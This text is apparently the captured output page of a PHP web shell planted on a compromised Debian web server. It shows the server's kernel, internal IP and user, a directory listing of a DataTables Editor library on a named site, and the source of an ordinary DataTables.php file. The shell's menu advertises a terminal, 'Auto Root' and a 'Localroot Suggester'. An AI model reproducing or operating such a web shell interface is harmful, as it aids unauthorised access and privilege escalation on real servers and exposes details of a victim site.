Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
cceconvenors /
js /
editor /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
Database
[ DIR ]
drwxr-sr-x
2021-07-01 11:35
Editor
[ DIR ]
drwxr-sr-x
2021-07-01 11:36
Vendor
[ DIR ]
drwxr-sr-x
2021-07-01 11:36
docs
[ DIR ]
drwxr-sr-x
2021-07-01 11:35
Bootstrap.php
1.06
KB
-rw-r--r--
2021-07-01 11:35
DataTables.php
920
B
-rw-r--r--
2021-07-01 11:35
Database.php
11.83
KB
-rw-r--r--
2021-07-01 11:35
Editor.php
62.4
KB
-rw-r--r--
2021-07-01 11:35
Ext.php
5.96
KB
-rw-r--r--
2021-07-01 11:35
License.txt
1.12
KB
-rw-r--r--
2021-07-01 11:35
composer.json
559
B
-rw-r--r--
2021-07-01 11:35
composer.php
360
B
-rw-r--r--
2021-07-01 11:35
config.php
1.2
KB
-rw-r--r--
2021-07-01 11:35
phpdoc.dist.xml
406
B
-rw-r--r--
2021-07-01 11:35
Save
Rename
<?php /** * DataTables PHP libraries. * * PHP libraries for DataTables and DataTables Editor, utilising PHP 5.3+. * * @author SpryMedia * @copyright 2012 SpryMedia ( http://sprymedia.co.uk ) * @license http://editor.datatables.net/license DataTables Editor * @link http://editor.datatables.net */ define("DATATABLES", true); // // Error checking - check that we are PHP 5.3 or newer // if ( version_compare( PHP_VERSION, "5.3.0", '<' ) ) { echo json_encode( array( "sError" => "Editor PHP libraries required PHP 5.3 or newer. You are ". "currently using ".PHP_VERSION.". PHP 5.3 and newer have a lot of ". "great new features that the Editor libraries take advantage of to ". "present an easy to use and flexible API." ) ); exit(0); } // // Load the DataTables bootstrap core file and let it register the required // handlers. // require( dirname(__FILE__).'/Bootstrap.php' );